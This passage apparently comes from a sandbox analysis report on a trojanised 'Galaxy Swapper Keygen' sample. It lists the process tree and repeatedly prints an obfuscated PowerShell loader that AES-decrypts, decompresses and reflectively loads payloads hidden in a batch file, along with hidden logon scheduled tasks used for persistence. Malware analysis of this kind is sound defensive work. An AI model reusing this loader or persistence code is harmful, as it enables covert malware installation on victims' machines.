$QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
66⤵
PID:8504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
66⤵
- Command and Scripting Interpreter: PowerShell
PID:8468

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
65⤵
PID:5640

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
66⤵
PID:6044

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
66⤵
PID:4608

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
67⤵
PID:6032

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
68⤵
PID:9984

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
68⤵
PID:3344

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
67⤵
PID:6084

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
68⤵
PID:5384

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
69⤵
PID:10196

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
69⤵
- Command and Scripting Interpreter: PowerShell
PID:6784

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
68⤵
PID:1628

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
69⤵
PID:3000

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
69⤵
PID:6000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
70⤵
PID:4976

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
71⤵
PID:10472

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
71⤵
PID:10492

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
70⤵
PID:5196

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
71⤵
PID:2200

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
72⤵
PID:9752

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
72⤵
- Command and Scripting Interpreter: PowerShell
PID:9080

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
71⤵
PID:6072

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
72⤵
PID:5664

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
73⤵
PID:10608

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
73⤵
- Command and Scripting Interpreter: PowerShell
PID:10644

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_910_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_910.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
74⤵
- Command and Scripting Interpreter: PowerShell
PID:11072

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_910.vbs"
74⤵
PID:12108

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_910.bat" "
75⤵
PID:11324

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
72⤵
PID:896

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
73⤵
PID:6024

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
74⤵
PID:9548

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
74⤵
PID:9400

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
73⤵
PID:6020

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
74⤵
PID:4040

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
74⤵
PID:3172

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
75⤵
PID:3332

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
76⤵
PID:7832

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
76⤵
- Command and Scripting Interpreter: PowerShell
PID:7852

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_651_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_651.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
77⤵
- Command and Scripting Interpreter: PowerShell
PID:12072

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
75⤵
PID:5492

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
76⤵
PID:6000

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
77⤵
PID:9164

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
77⤵
- Command and Scripting Interpreter: PowerShell
PID:5692

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_736_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_736.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
78⤵
- Command and Scripting Interpreter: PowerShell
PID:12488

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
76⤵
PID:2836

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
77⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
77⤵
PID:928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
78⤵
PID:6048

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('PCbRSPiPEXwsgUlV8KbYzYR8L0LBM8BX6iR7vNXLBKI='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gzYNf938u5x3/Go6279N0A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vBYGZ=New-Object System.IO.MemoryStream(,$param_var); $lhEyE=New-Object System.IO.MemoryStream; $SlvSx=New-Object System.IO.Compression.GZipStream($vBYGZ, [IO.Compression.CompressionMode]::Decompress); $SlvSx.CopyTo($lhEyE); $SlvSx.Dispose(); $vBYGZ.Dispose(); $lhEyE.Dispose(); $lhEyE.ToArray();}function execute_function($param_var,$param2_var){ $jzyDV=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $CaYje=$jzyDV.EntryPoint; $CaYje.Invoke($null, $param2_var);}$QNDlT = 'C:\Users\Admin\AppData\Local\Temp\WizClient.bat';$host.UI.RawUI.WindowTitle = $QNDlT;$dKMTm=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($QNDlT).Split([Environment]::NewLine);foreach ($sWkdY in $dKMTm) { if ($sWkdY.StartsWith('gEWESOAzklUTNdYpSKZu')) { $myztF=$sWkdY.Substring(20); break; }}$payloads_var=[string[]]$myztF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
79⤵
PID:1340

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
79⤵
- Command and Scripting Interpreter: PowerShell
PID:10092

C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe
"C:\Users\Admin\AppData\Local\Temp\Galaxy Swapper Keygen.exe"
78⤵
PID:5224

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\WizClient.bat" "
79⤵
PID:1472

C:\Windows\SysWOW64\cmd.exe
